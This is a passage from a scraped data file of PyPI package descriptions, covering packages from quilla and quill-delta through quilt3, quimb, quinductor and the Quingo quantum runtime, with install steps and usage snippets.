thefeaturesdocs for an overview of all quilla can do!QuickstartRunpip install quillaEnsure that you have the correct browser and drivers. Quilla will autodetect drivers that are in your PATH or in the directory it is calledWrite the following asValidation.json, substituting \"Edge\" for whatever browser you have installed and have the driver for:{\"targetBrowsers\":[\"Edge\"],\"path\":\"https://www.bing.com\",\"steps\":[{\"action\":\"Validate\",\"type\":\"URL\",\"state\":\"Contains\",\"target\":\"bing\"}]}Runquilla -f Validation.jsonInstallationNote: It ishighly recommendedthat you use a virtual environment whenever you install new python packages.\nYou can install Quilla by cloning the repository and runningmake install.Quilla is available onPyPI, and can be installed by runningpip install quilla.For more information on installation options (such as installing from source) and packaging Quilla for remote install, check out the documentation for ithereWriting Validation FilesCheck out the documentation for ithereContext ExpressionsThis package is able to dynamically inject different values, exposed through context objects and expressions whenever the validation JSON would ordinarily require a regular string (instead of an enum). This can be used to grab values specified either at the command-line, or through environment variables.More discussion of context expressions and how to use them can be found in the documentation filehereGenerating DocumentationDocumentation can be generated through themakecommandmake docsCheck out the documentation for ithereMake commandsA Makefile is provided with several convenience commands. You can find usage instructions withmake help, or below:Usage:\n make [target]\n\nTargets:\n help Print this help message and exit\n package Create release packages\n package-deps Create wheel files for all runtime dependencies\n docs Build all the docs in the docs/_build directory\n clean-python Cleans all the python cache & egg files files\n clean-docs Clean the docs build directory\n clean-build Cleans all code build and distribution directories\n clean Cleans all build, docs, and cache files\n install Installs the package\n install-docs Install the package and docs dependencies\n install-tests Install the package and test dependencies\n install-all Install the package, docs, and test dependenciesContributingThis project welcomes contributions and suggestions. Most contributions require you to agree to a\nContributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us\nthe rights to use your contribution. For details, visithttps://cla.opensource.microsoft.com.When you submit a pull request, a CLA bot will automatically determine whether you need to provide\na CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions\nprovided by the bot. You will only need to do this once across all repos using our CLA.This project has adopted theMicrosoft Open Source Code of Conduct.\nFor more information see theCode of Conduct FAQor\ncontactopencode@microsoft.comwith any additional questions or comments.TrademarksThis project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft\ntrademarks or logos is subject to and must followMicrosoft's Trademark & Brand Guidelines.\nUse of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship.\nAny use of third-party trademarks or logos are subject to those third-party's policies."} +{"package": "quillbot-cat", "pacakge-description": "# frase_api"} +{"package": "quilldelta", "pacakge-description": "No description available on PyPI."} +{"package": "quill-delta", "pacakge-description": "Delta (Python Port)Python port of the javascript Delta library for QuillJS:https://github.com/quilljs/deltaSome basic pythonizing has been done, but mostly it works exactly like the above library.There is no other python specific documentation at this time, sorry. Please see the tests\nfor reference examples.Install withPoetryWith HTML rendering:> poetry add -E html quill-deltaWithout HTML rendering:> poetry add quill-deltaInstall with pipNote: If you're usingzsh, see below.With HTML rendering:> pip install quill-delta[html]With HTML rendering (zsh):> pip install quill-delta\"[html]\"Without HTML rendering:> pip install quill-deltaRendering HTML in PythonThis library includes a moduledelta.htmlthat renders html from an operation list,\nallowing you to render Quill Delta operations in full from a Python server.For example:from delta import html\n\nops = [ \n { \"insert\":\"Quill\\nEditor\\n\\n\" },\n { \"insert\": \"bold\",\n \"attributes\": {\"bold\": True}},\n { \"insert\":\" and the \" },\n { \"insert\":\"italic\",\n \"attributes\": { \"italic\": True }},\n { \"insert\":\"\\n\\nNormal\\n\" },\n]\n\nhtml.render(ops)Result (line formatting added for readability):

Quill

\n

Editor

\n


\n

bold and the italic

\n


\n

Normal

See test_html.pyfor more examples.DevelopingSetupIf you'd to contribute to quill-delta-python, get started setting your development environment by running:Checkout the repository> git clone https://github.com/forgeworks/quill-delta-python.gitMake sure you have python 3 installed, e.g.,> python --versionFrom inside your new quill-delta-python directory:> python3 -m venv env\n> source env/bin/activate\n> pip install poetry\n> poetry install -E htmlTestsTo run tests do:> py.test"} +{"package": "quillix", "pacakge-description": "Quillix is a Python package designed for local database management using JSON as the underlying storage format. With Quillix, users can seamlessly create, manage, and query databases through a simplified interface. The package provides a convenient way to perform basic database operations, execute SQL-like queries, and manage data with ease.Usageimport quillix as qx, then just call the query() function like, qx.query(\"your query\").Note: 1. \"Alter table\" has only column based operations which include \"drop\", \"rename\", \"add\".\n 2. In \"update table\" syntax, \"column1 = column1 + value\" is written as \"column1 + value\".\n 3. Syntax does not include semi-colon(;) in the end.\n 4. Enclose conditions after \"where\" keyword with brackets.\n Example, \"select * from table_name where ((column1 > 5) or (column2 == hello world))\"\n 5. while using \"group by\" or \"order by\" clause, no need to mention the grouping or sorting columns in the column details between \"select\" and \"from\" keyword.\n 6. \"Join\" does not work, however you can use object based syntax.\n Example, \"select count(b.col4) from a testTable, b testTable2 where (a.col2 == b.col5) group by a.col1\"When you create a database, you will find a data.json file being created in your project directory. It will store all the data that you put in your database.Complete documentation will be available in a few days."} +{"package": "quills.app", "pacakge-description": "==========quills.app==========This package is a part of the Quills Blogging Suite. It contains codeshared between Products.Quills and Products.QuillsEnabled.For further information about Quills, see package https://github.com/collective/Products.Quills.Changelog=========1.8.1 (2016-12-27)----------------- add Plone version classifiers[tkimnguyen]- include all needed files[skurfer]1.8 (2012-12-17)----------------- Plone 4.3 compatibility[ale-rt]- Handle case when attribute parentsInThread does not exist on comment[tkimnguyen]1.8a1 (2011-03-30)------------------- Compatibility with Plone 4 [sargo] (r100977_, r100979_)- Fixed problem where blog's topics view acquired an object with the tag namefrom higher up instead of showing blogs with that tag. [jcbrand] (r232360_)For older entries, please see Products.Quills/Products.QuillsEnabled for a changes."} +{"package": "quills.core", "pacakge-description": "This package is a part of the Quills Blogging Suite. It contains Core weblog\ninterfaces and views.For further information about Quills, see package Products.Quills.ChangelogSee package Products.Quills/Products.QuillsEnabled for a changelog."} +{"package": "quillsql", "pacakge-description": "Quill Python SDKQuickstartFirst, install the quillsql package by running:$pipinstallquillsqlThen, add a/quillendpoint to your existing python server. For example, if\nyou were running a FASTAPI app, you would just add the endpoint like this:fromquillsqlimportQuillfromfastapiimportFastAPI,Requestapp=FastAPI()quill=Quill(private_key=,database_connection_string=,)# ... your existing endpoints here ...@app.post(\"/quill\")asyncdefquill_post(data:Request):body=awaitdata.json()returnquill.query(org_id=\"2\",data=body)Then you can run your app like normally. Pass in this route to our react library\non the frontend and you all set!For local testing (dev purposes only)pipenv install\npipenv shell\nuvicorn examples.fastapi-server.app:app --reload --port 3000You are now ready to ping your local server athttp://localhost:3000.TroubleshootingIf you run into issues withLibrary not loaded: @rpath/libpq.5.dyliborno LC_RPATH's found, try uninstalling and reinstalling postgres on your machine. For example, using homebrew:$brewuninstallpostgresql\n$brewupdate\n$brewinstallpostgresqlIf you're still having this issue, this resource might also be useful for you:https://www.psycopg.org/docs/install.html."} +{"package": "quills.remoteblogging", "pacakge-description": "UNKNOWN"} +{"package": "quilt", "pacakge-description": "quiltis a command-line utility that builds, pushes, and installs\ndata packages. Adata packageis a versioned bundle of serialized data wrapped in a Python module.quiltpushes to and pulls from the package registry at quiltdata.com.Visitquiltdata.comfor docs and more."} +{"package": "quilt3", "pacakge-description": "Quilt manages data like code (with packages, repositories, browsing and\nrevision history) so that teams can experiment faster in machine learning,\nbiotech, and other data-driven domains.Thequilt3PyPI package allows you to build, push, and install data packages.\nVisit thedocumentation quickstartto learn more."} +{"package": "quilt3distribute", "pacakge-description": "quilt3distributePeople commonly work with tabular datasets, people want to share their data, this makes that easier through Quilt3.FeaturesAutomatically determines which files to upload based off CSV headers. (Explicit override available)Simple interface for attaching metadata to each file based off the manifest contents.Groups metadata for files that are referenced multiple times.Validates and runs basic cleaning operations on your dataset manifest CSV.Optionally add license details and usage instructions to your dataset README.Parses README for any referenced files and packages them up as well.Support for adding extra files not contained in the manifest.Constructs an \"associates\" map that is placed into each files metadata for quick navigation around the package.Enforces that the metadata attached to each file is standardized across the package for each file column.Quick StartConstruct a csv (or pandas dataframe) dataset manifest (Example):CellIdStructure2dReadPath3dReadPath1lysosome2d/1.png3d/1.tiff2laminb12d/2.png3d/2.tiff3golgi2d/3.png3d/3.tiff4myosin2d/4.png3d/4.tifffromquilt3distributeimportDataset# Create the datasetds=Dataset(dataset=\"single_cell_examples.csv\",name=\"single_cell_examples\",package_owner=\"jacksonb\",readme_path=\"single_cell_examples.md\")# Optionally add common additional requirementsds.add_usage_doc(\"https://docs.quiltdata.com/walkthrough/reading-from-a-package\")ds.add_license(\"https://www.allencell.org/terms-of-use.html\")# Optionally indicate column values to use for file metadatads.set_metadata_columns([\"CellId\",\"Structure\"])# Optionally rename the columns on the package levelds.set_column_names_map({\"2dReadPath\":\"images_2d\",\"3dReadPath\":\"images_3d\"})# Distributepkg=ds.distribute(push_uri=\"s3://quilt-jacksonb\",message=\"Initial dataset example\")Returns:(remote Package)\n \u2514\u2500README.md\n \u2514\u2500images_2d\n \u2514\u250003cdf019_1.png\n \u2514\u2500148ddc09_2.png\n \u2514\u25002b2cf361_3.png\n \u2514\u2500312a0367_4.png\n \u2514\u2500images_3d\n \u2514\u2500a0ce6e01_1.tiff\n \u2514\u2500c360072c_2.tiff\n \u2514\u2500d9b55cba_3.tiff\n \u2514\u2500eb29e6b3_4.tiff\n \u2514\u2500metadata.csv\n \u2514\u2500referenced_files\n \u2514\u2500some_file_referenced_by_the_readme.pngExample Metadata:pkg[\"images_2d\"][\"03cdf019_1.png\"].meta{\"CellId\":1,\"Structure\":\"lysosome\",\"associates\":{\"images_2d\":\"images_2d/03cdf019_1.png\",\"images_3d\":\"images_3d/a0ce6e01_1.tiff\"}}InstallationStable Release:pip install quilt3distributeDevelopment Head:pip install git+https://github.com/AllenCellModeling/quilt3distribute.gitCreditsThis package was created with Cookiecutter.Original repositoryFree software: Allen Institute Software License"} +{"package": "quilt3-local", "pacakge-description": "Quilt3 catalog: Local development modeOpen source implementation of the Quilt3 registry that works in the local\nenvironment (not requiring AWS cloud services aside from S3 / S3 Select).This package is not intended to be installed/used directly by end users.\nInstead, installquilt3[catalog]and usequilt3 catalogCLI command.DevelopingTL;DR# set up venv, assuming poetry is available in the PATHpoetryinstall# build catalog bundle(cd../catalog&&npmi&&npmrunbuild&&cp-rbuild../quilt3_local/quilt3_local/catalog_bundle)# run the app at http://localhost:3000poetryrunquilt3-localSet-upPython environment set-upFirst, you needpoetryinstalled.Then, you have to set up the virtualenv by runningpoetry installfrom the\nproject directory -- it will create a virtualenv and install the requirements.Catalog (node.js) environment set-upRefer to thecatalog documentation.RunningYou can either serve a static catalog bundle (produced bynpm run build) or\nproxy static files from a running catalog instance.NOTE: you need valid AWS credentials available, seeboto3 docsfor details.Serving a static catalog bundleRunpoetry run quilt3-localto start the app on port 3000 serving the static\ncatalog bundle from the./quilt3_local/catalog_bundledirectory.\nPath to the bundle can be overriden byQUILT_CATALOG_BUNDLEenv var.\nPort can be configured viaPORTenv var.In order to serve the bundle, you should first build it by runningnpm run buildfrom the catalog directory and then either copying it to./quilt3_loca/catalog_bundleor overridingQUILT_CATALOG_BUNDLEto point to\nyour bundle.\nHowever, this approach is not very convenient when developing catalog features,\nsince it requires rebuilding the bundle to pick up the changes.\nTo address this there's a \"proxy\" mode available.Proxying a running catalog instanceIn this mode the app proxies all the static files requests to a running catalog\ninstance. One can be started by executingPORT=3001 npm startfrom the catalog\ndirectory (setting port to3001required to avoid conflict with thequilt3_localapp's default settings).After starting up a catalog instance, you can start thequilt3_localapp and\npoint it to that instance by runningQUILT_CATALOG_URL=http://localhost:3001 poetry run quilt3-local(the app will be available athttp://localhost:3000and will serve static\nfiles from the catalog running athttp://localhost:3001, catalog URL\nconfigurable viaQUILT_CATALOG_URLenv var).Building and publishingMake sure you set upcredentials forpoetryBump package version inpyproject.tomland updateCHANGELOG.mdUpdate catalog commit hash incatalog-commitif requiredCommit, tag, push:git c -am \"release X.Y.Z\" && git tag vX.Y.Z && git push && git push --tagsBuild and publish the package:make publish"} +{"package": "quiltcore", "pacakge-description": "QuiltCoreQuiltCore is a library for building and runningQuiltdata packages.\nIt is designed to leverage standard open source technology and YAML configuration files\nso that it can easily be ported to other languages and platforms.This initial implementation is in Python.Key TechnologiesApacheArrowfor reading, writing, and representing manifestsPyArrowfor Python bindings to Arrowfsspecfilesystemsfor reading and writing files from various sourcesPyYAMLfor reading and writing YAML configuration filesExamplepoetryinstall#!/usr/bin/env pythonimportosfromquiltcoreimportDomain,UDIfromtempfileimportTemporaryDirectoryfromupathimportUPathTEST_BKT=\"s3://quilt-example\"TEST_PKG=\"akarve/amazon-reviews\"TEST_TAG=\"1570503102\"TEST_HASH=\"ffe323137d0a84a9d1d6f200cecd616f434e121b3f53a8891a5c8d70f82244c2\"TEST_KEY=\"camera-reviews\"WRITE_BKT=os.environ.get(\"WRITE_BUCKET\")SOURCE_URI=f\"quilt+{TEST_BKT}#package={TEST_PKG}:{TEST_TAG}\"DEST_URI=f\"quilt+{TEST_BKT}#package={TEST_PKG}:{TEST_TAG}\"Get Manifestremote=UDI.FromUri(SOURCE_URI)print(f\"remote:{remote}\")withTemporaryDirectory()astmpdir:local=UPath(tmpdir)domain=Domain.FromLocalPath(local)print(f\"domain:{domain}\")folder=domain.pull(remote)print(f\"folder:{folder}\")ifWRITE_BKT:tag=domain.push(folder,remote=UDI.FromUri(DEST_URI))print(f\"tag:{tag}\")"} +{"package": "quilter", "pacakge-description": "QuilterThe composer of Matplotlib plots. Python implementation of the R package patchwork.This package overloads/creates operators for the matplotlib Figure class so that you can add and divide figures together into a new figure with subplots.Adding two figures together creates a new figure with the original figures side-by-side as subplots. Dividing will stack the figured on top of each other.Currently the package converts the input figures to images before reloading the images into the axes objects of the output figure. If anyone has a better way to copy actual axes objects to a new figure I'd loved help.Here are some examples:import matplotlib.pyplot as plt\nimport quilter # best to put this after your matplotlib import\n\nfig1, ax1 = plt.subplots(figsize=(5,3))\nax1.plot([1, 2], label='my leg')\nax1.set_title(\"test\")\nax1.legend()\n\nfig2, ax2 = plt.subplots(figsize=(5,3))\nax2.plot([2, 2])\nax2.set_title(\"test 2\")Adding figures togetherout = fig1 + fig2Dividing figuresout = fig1 / fig2More complex examplesout = (fig1 + fig2) / fig2\n\nout = (fig1 + fig2) / (fig1 + fig2)"} +{"package": "quilt-installer", "pacakge-description": "Administration tool for Quilt Data infrastructure stacks."} +{"package": "quilt-lang", "pacakge-description": "A Python library that lets you write less code to do more things.Documentation availablehere.Getting startedInstall via pippipinstallquilt-langImportingimportquilt_langas_Example usageif_.ready:print(\"Quilt is ready.\")For more commands, visitthis website.How you can make Quilt betterAt the moment, you can help byAdding more functions which you or someone else might find usefulAdding and maintaining the docstringsAdding and improving unit testsLicenseQuilt is licensed under theApache 2.0 License."} +{"package": "quiltplus", "pacakge-description": "QuiltPlusNext-generation API for Quilt Universal Data CollectionsQuiltPlus provides an asychronous, object-oriented wrapper around the Quilt API.\nIn particular, it implements a resource-based architecture using Quilt+ URIs in\norder to support the Universal Data Clientudc.Installationpython3-mpipinstallquiltplusUsagefromquiltplusimportQuiltPackageimportanyioURI=\"quilt+s3://quilt-example#package=examples/wellplates\"asyncdefprint_contents(uri:str):pkg=QuiltPackage.FromURI(URI)files=awaitpkg.list()print(files)anyio.run(print_contents,URI)"} +{"package": "quilt-py", "pacakge-description": "hello!"} +{"package": "quilt-stack-installer", "pacakge-description": "Command-line tool for installing Quilt as a CloudFormation stack."} +{"package": "quiltsync", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quiltz", "pacakge-description": "Quiltz is deprecatedPlease usequiltz-domain"} +{"package": "quiltz-domain", "pacakge-description": "quiltz-domainPython domain concepts for quiltzPurposeAtQWANwe're building some applications in Python. We collect useful stuff in\nthe different Quiltz projects:quiltz-domain(this package) contains domain oriented support modules like entity\nids, results, email anonymization, validators and parsersquiltz-testsupportcontains test support modules, that supports e.g. automated testing for SMTP integration, probing asynchronous results and\nasserting log statementsquiltz-messagingcontains a\nmessaging domain concept and an engines to send messages. Currently only\nsending emails over SMTP is supported.Installingpipinstallquiltz-domainSeedocumentation"} +{"package": "quiltz-messaging", "pacakge-description": "quiltz-messagingpython (email) messaging packagePurposeAt QWAN, we're building some applications in python. We collect useful stuff in\nquiltz packages:quiltz-domaincontains domain\nlevel modules like, entity id's, results, an email anonymizer, validators and\nparsersquiltz-testsupportcontains test support modules, that supports mainly non unit tests, like\nintegrating with smtp, probing asynchronous results and asserting log\nstatementsquiltz-messaging(this package) contains a messaging domain concept and an\nengine(s) to send the messages. Currently, only smtp sending is supported.installingpipinstallquitlz-messagingseedocumentation"} +{"package": "quiltz-testsupport", "pacakge-description": "quiltz-testsupportA package for test supportPurposeAtQWANwe're building some applications in python. We collect usefull stuff in quiltz packages:quiltz-domaincontains domain\nlevel modules like, entity id's, results, an email anonymizer, validators and\nparsersquiltz-testsupport(this package) contains test support modules, that supports mainly non\nunit tests, like integrating with smtp, probing asynchronous results and\nasserting log statementsquiltz-messagingcontains a\nmessaging domain concept and an engines to send the messages. Currently only\nsmtp sending is supported.Modules in this packageloggingWith the logging module you can assert log statements in a test using thelog_collectorfixture:in test:fromquiltz.testsupportimportlog_collectordeftest_logs_hello(log_collector):foo()log_collector.assert_info('hello info')in productiondeffoo():logger=logging.getLogger()logger.info('hello info')probingWith the probing module you can probe for async results:fromhamcrestimportassert_that,equal_tofromquiltz.testsupportimportprobe_thatdeftest_stub_server_collects_message_for_recepient(self):message=aMessage(recipient='rob@mailinator.com',sender='no-reply@qwan.eu',subject='test',body='hello test')self.message_engine.send([message])probe_that(lambda:self.server.messages==[stringified_message(message)])# orprobe_that(lambda:assert_that(self.server.messages,equal_to([stringified_message(message)])))# orprobe_that(lambda:self.server.messages,equal_to([stringified_message(message)]))smtpWith the smtp module you can create a stub smtp server that collects smtp messagesfromhamcrestimportassert_that,equal_tofromquiltz.testsupportimportprobe_thatdefserver()server=StubSmtpServer(hostname='localhost',port=9925)server.start()yield(server)server.stop()deftest_collects_message_for_recepient(self,server):message_engine=SMTPClientForTest(host='localhost',port='9925')message=aMessage(recipient='rob@mailinator.com',sender='no-reply@qwan.eu',subject='test',body='hello test')message_engine.send([message])probe_that(lambda:assert_that(server.messages,equal_to([stringified_message(message)])))installingpipinstallquiltz-testsupport"} +{"package": "quimb", "pacakge-description": "quimbis an easy but fast python library for'quantum information many-body'calculations, focusing primarily ontensor networks. The code is hosted ongithub, and docs are hosted onreadthedocs. Functionality is split in two:Thequimb.tensormodule contains tools for working withtensors and tensor networks. It has a particular focus on automatically handling arbitrary geometry, e.g. beyond 1D and 2D lattices. With this you can:construct and manipulate arbitrary (hyper) graphs of tensor networksautomaticallycontract, optimize and draw networksuse various backend array libraries such asjaxandtorchviaautorayrun specific MPS, PEPS, MERA and quantum circuit algorithms, such as DMRG & TEBDThe corequimbmodule contains tools for reference'exact'quantum calculations, where the states and operator are represented as eithernumpy.ndarrayorscipy.sparsematrices. With this you can:construct operators in complicated tensor spacesfind groundstates, excited states and do time evolutions, including withslepccompute various quantities including entanglement measurestake advantage ofnumbaaccelerationsstochastically estimate $\\mathrm{Tr}f(X)$ quantitiesThefull documentationcan be found at:quimb.readthedocs.io. Contributions of any sort are very welcome - please see thecontributing guide.Issuesandpull requestsare hosted ongithub. For other questions and suggestions, please use thediscussions page."} +{"package": "quimera", "pacakge-description": "Pentesting and OSINT Tool Kit for Ethical Hacking"} +{"package": "quimeraps", "pacakge-description": "Quimera printing service is a jon-rpc server that processes jasperreports reports and fills them with the information received through calls to the service.It consists of 3 parts:\n-server. Json-rpc server processing calls\n-customer. PyQt6 interface in charge of viewing the status of the server and managing printers and models.\n-daemon. Allows you to install and / or remove the quimera service on the host operating system.Installation:\nRequirements:Java JRE 9 (tested with OpenJDK 11 on windows) (Set JAVA_HOME in environment variables)Ghostscript (tested with 9.55 on windows)GitWindows.\nIn console with administrator privileges we execute:\npip install quimeraps\npip install git+https://github.com/acesseonline/pyreportjasper@master#egg=pyreportjasperLinux\nsudo -H pip3 install quimeraps\nsudo -H pip3 install git+https://github.com/acesseonline/pyreportjasper@master#egg=pyreportjasperService installation (Linux):\nquimeraps_daemon install. This service can be managed in the style of service quimeraps [start, stop, restart]Service installation (Windows):\nDownload NSSM fromhttps://nssm.cc/downloadUse \"nssm.exe install QuimeraPrintService\". Set quimeraps_server path and accept.Uninstall service (Linux):\nquimeraps_daemon removeIf we want to launch a server manually through the console:We must make sure that there are no other quimera servers running on the machine.We run quimeraps_server with administrator privileges.Using reports:\nThe reports must be located:(Linux) /opt/quimeraPS/reports(Windows) ...\\ProgramFiles\\quimeraPS\\reportsRegistration of models and printer.\nFor easy management of models and printers, quimeraps_client has been provided, which allows visually mapping existing printers and models with aliases recognized by the client.The log can be found in:(Linux) /var/log/quimeraps.log(Windows) ...\\ProgramFiles\\quimeraPS\\quimera.logYou can enable the use of chimeraps with ssl as follows:Inside the chimeraPS folder, we create the cert folder and add the ssl.cert and ssl.key files. If the ssl.key file does not exist, an adhoc ssl connection will be created.Instructions for generating certificate and ssl password.$ openssl genrsa 2048 > ssl.key\n$ openssl req -new -x509 -nodes -sha1 -days 365 -key ssl.key > ssl.cert"} +{"package": "quin", "pacakge-description": "No description available on PyPI."} +{"package": "quina", "pacakge-description": "No description available on PyPI."} +{"package": "quince", "pacakge-description": "The reference API implementation for Quincy (REST interface to StackTach.v3)"} +{"package": "quincy", "pacakge-description": "quincy> \u201cIf you want to get the answers, talk to Quincy \u2026\u201d![Quincy](images/quincy.jpg)Just like the famous forensic pathologist, you can talk to Quincy to ask\nquestions of StackTach.v3. \u201cHow happened to this instance?\u201d \u201cHow did it die?\u201d\n\u201cWho touched it last?\u201d \u201cWas it in pain?\u201dQuincy is a REST interface for StackTach.v3 \u2026 but it\u2019s only the API, there\nis no implementation. The default implementation is a dummy one for testing\npurposes. You can specify different implementations as you like. So, if\nyou have another monitoring service that you would like to expose with a\nStackTach.v3 interface, you can adopt Quincy. However, if you want to work with\nStackTach.v3, there is a [quince](https://github.com/StackTach/quince) driver\nthat handles that for you.Later in this document we will show you how to configure Quincy to use\nthe Quince drivers.The [klugman](https://github.com/StackTach/klugman) library is both a cmdline\ntool for accessingquincyand a python library for programmatically accessing it.api\u2026/v1/\n\u2026/v1/events/"} +{"package": "quinductor", "pacakge-description": "QuinductorA multilingual data-driven method for generating reading comprehension questions. The official repository for the Quinductor article:https://arxiv.org/abs/2103.10121DataWe useTyDi QA dataset, which you can easily get by runningget_tydiqa_data.shHow to work with the induced templates?Quinductor is now available as a Python package that can be installed viapip install quinductor. After that you can download the induce templates for your language by running the following in the Python shell (the example is for English).>>>importquinductorasqi>>>qi.download('en')The avaible languages with a wide set of templates are:Arabic (ar)English (en)Finnish (fi)Indonesian (id)Japanese (ja)Russian (ru)Templates are also available for the other languages listed below, but Quinductor did not manage to induce many templates on the TyDiQA.Korean (ko)Telugu (te)After having downloaded the templates for your language, you can get access to them by running>>>tools=qi.use('en')Starting from v0.2.0, you can also use thetoolsdictionary to quickly induce QA-pairs using the following piece of code.importquinductorasqiimportudon2tools=qi.use(\"en\")trees=udon2.ConllReader.read_file(\"example.conll\")res=qi.generate_questions(trees,tools)print(\"\\n\".join([str(x)forxinres]))Each element in thereslist above will be an instance ofGeneratedQAPairclass, which has the following properties:q-- generated question as a stringa-- generated answer as a stringscore-- the Quinductor score for this QA-pair (the list is sorted in the descending order of the scores)template-- a list of templates that resulted in the induced QA-pairHow to induce templates yourself?Generate auxiliary models:IDFs by runningcalculate_idf.shranking models by runningget_qword_stat.shInduce templates and guards by runninginduce_templates.shIf you want to induce templates only for a specific language, please choose the correpsonding lines from the shell scripts.Using your own templatesQuinductor templates constitute a plain text file with a number of induced templates. However, in order for them to be used, Quinductor requires a number of extra files in addition to the templates file:guards file -- a plain text file with guards for all templates, i.e. conditions on the dependency trees that must be satisfied for applying each templateexamples file -- a file containing the sentences from the training corpus that gave rise to each templatequestion word model -- a dill binary file containing the question word model (see the associated article for explanations), can be induced by usingqword_stat.pyscriptanswer statistics file -- a dill binary file containng the statistics about pos-morph expressions for the root tokens of the answers in the training set, used for filtering (can be induced usingqword_stat.pyscript also)pos-morph n-gram model folder -- a folder containing a number of plain text files with n-gram models of pos-morph expressions (see the associated article for more details andewt_dev_freq.txtfor the example of the file format)Quinductor templates along with all aforementioned extra files constitute a Quinductor model. Each such model must be organized as a folder with the following structure:|- language code\n |- pos_ngrams -- a folder with pos-morph n-gram model\n |- dataset name -- a name of the dataset used for inducing templates\n |- a unique name for templates -- a timestamp if templates induced by the script from this repo\n |- guards.txt -- guards file\n |- templates.txt -- templates file\n |- sentences.txt -- examples file\n |- atmpl.dill -- answer statistics file\n |- qwstats.dill -- question word model fileIf you want to use a custom Quinductor model, you should organize your folder according to the structure above and give the path to the folder withtemplates.txtfile as an extra argument calledtemplates_folderto theqi.usemethod, as shown below.importquinductorasqitools=qi.use('sv',templates_folder='my_templates/sv/1613213402519069')If you want only parts of a Quinductor model to differ from one of the default models, you can specify more fine-grained self-explanatory arguments to theqi.usemethod:guards_files,templates_files,pos_ng_folder,example_files,qw_stat_file,a_stat_file.How to evaluate?We usenlg-eval packageto calculate automatic evaluation metrics.\nThis package requires to have hypothesis and ground truth files, where each line correspond to a question generated based on the same sentence.\nTo generate these files, please runevaluate.sh(if you want to induce templates only for a specific language, please choose the correpsonding lines from the shell scripts.).Then automatic evaluation metrics can be calculated by running a command similar to the following (example is given for Arabic):nlg-eval --hypothesis templates/ar/1614104416496133/eval/hypothesis_ar.txt --references templates/ar/1614104416496133/eval/ground_truth_ar_0.txt --references templates/ar/1614104416496133/eval/ground_truth_ar_1.txt --references templates/ar/1614104416496133/eval/ground_truth_ar_2.txt --no-glove --no-skipthoughtsCite us@misc{kalpakchi2021quinductor,\n title={Quinductor: a multilingual data-driven method for generating reading-comprehension questions using Universal Dependencies}, \n author={Dmytro Kalpakchi and Johan Boye},\n year={2021},\n eprint={2103.10121},\n archivePrefix={arXiv},\n primaryClass={cs.CL}\n}"} +{"package": "quine-mccluskey", "pacakge-description": "A Python implementation of the Quine McCluskey algorithm.This implementation of the Quine McCluskey algorithm has no inherent limits\n(other than the calculation time) on the size of the inputs.Also, in the limited tests of the author of this module, this implementation is\nconsiderably faster than other public Python implementations for non-trivial\ninputs.Another unique feature of this implementation is the possibility to use the XOR\nand XNOR operators, in addition to the normal AND operator, to minimise the\nterms. This slows down the algorithm, but in some cases the result can be much\nmore compact than a sum of product.How to install qm.pyInstall the package withpython setup.py installThis needs superuser privileges. If you want to install the package locally,\nyou can run:mypath=XXX\nPYTHONPATH=$mypath/lib/python2.7/site-packages/ python setup.py install \u2013prefix $mypathwhere XXX can be any path. You may have to change the PYTHONPATH according to your\npython version."} +{"package": "quine-mccluskey-tomas789", "pacakge-description": "qm.pyA Python implementation of the Quine McCluskey algorithm.This implementation of the Quine McCluskey algorithm has no inherent limits\n(other than the calculation time) on the size of the inputs.Also, in the limited tests of the author of this module, this implementation is\nconsiderably faster than other public Python implementations for non-trivial\ninputs.Another unique feature of this implementation is the possibility to use the XOR\nand XNOR operators, in addition to the normal AND operator, to minimise the\nterms. This slows down the algorithm, but in some cases the result can be much\nmore compact than a sum of product.InstallationThe recommanded way of installing this package is by using pippython3-mpipinstallquine-mccluskey-tomas789Note that on Windows you might need to use thepycommand instead.py-mpipinstallquine-mccluskey-tomas789There are some othere means of installing the package which are recommanded only in specific cases.Development buildpython3-mpipinstall-e.Build wheel files locallyMake sure you have the latest version of PyPA's build installed:python3-mpipinstall--upgradebuildNow run this command from the same directory where pyproject.toml is located:python3-mbuildThis command should output a lot of text and once completed should generate two files in the dist directory:dist/\n\u251c\u2500\u2500 quine_mccluskey_tomas789-1.0-py2.py3-none-any.whl\n\u2514\u2500\u2500 quine_mccluskey_tomas789-1.0.tar.gzWheel file can then be distributed via your own means and installed using pippython3-mpipinstalldist/quine_mccluskey_tomas789-1.0-py2.py3-none-any.whlRunning testsUnit testsThe library comes with a basic set of unit tests. They can be executed usingpytestpytestFuzz testingWe also have a fuzz testing. It generates random formulas, simplifies them and checks that the result is correct.\u279cquine-mccluskey-tomas789git:(main)pythonfuzz.pyChecked24300formulasandfound0errors.\nChecked48400formulasandfound0errors.\nChecked72300formulasandfound0errors.\nChecked96300formulasandfound0errors.\nTestingformulas...\u280b0:00:44"} +{"package": "quine-time", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quingo", "pacakge-description": "Quingo Runtime SystemAlong with quingo compilers, the Quingo runtime system which provides users the capability to program and simulate Quingo programs.InstallationThe Quingo installation comprises of two main steps:Install the Runtime system and simulatorInstall Quingo runtime system with required simulators using the following command:pipinstall-e.# for simulators used:gitclonehttps://gitee.com/hpcl_quanta/tequila.git\ngitcheckoutxbackend\npipinstall-e.\n\ngitclonehttps://gitee.com/quingo/pyqcisim.git\ngitcheckoutbug-fix\npipinstall-e.\n\ngitclonehttps://gitee.com/quingo/SymQC.git\npipinstall-e.Upon success, it will automatically install the Quingo runtime system (this package), the PyQCAS simulator and the PyQCISim simulator.Install the Quingo compilerWe can install mlir-based quingo compiler in two ways:Install the mlir-based Quingo compiler using the following command:python-mquingo.install_quingocDownloadmlir-based Quingo compilerWindows: unzip .zip file, add directory which contains the quingoc executable file to system environment PATH.Linux: as the following sample usage, Quingoc will be installed to user defined directory, then add directory which contains the quingoc executable file to system environment PATH.quingo-compiler-0.1.4.sh-prefix=/home/user/.localMacos: uncompress .dmg file, copy quingoc executable file to user defined directory, then add directory which contains the quingoc executable file to system environment PATH.UsageA simple example can be found in the directorysrc/examples. You can simply run the bell_state example by running:cdsrc/examples/bell_state\npythonhost.pyIf everything runs correctly, you should see the following 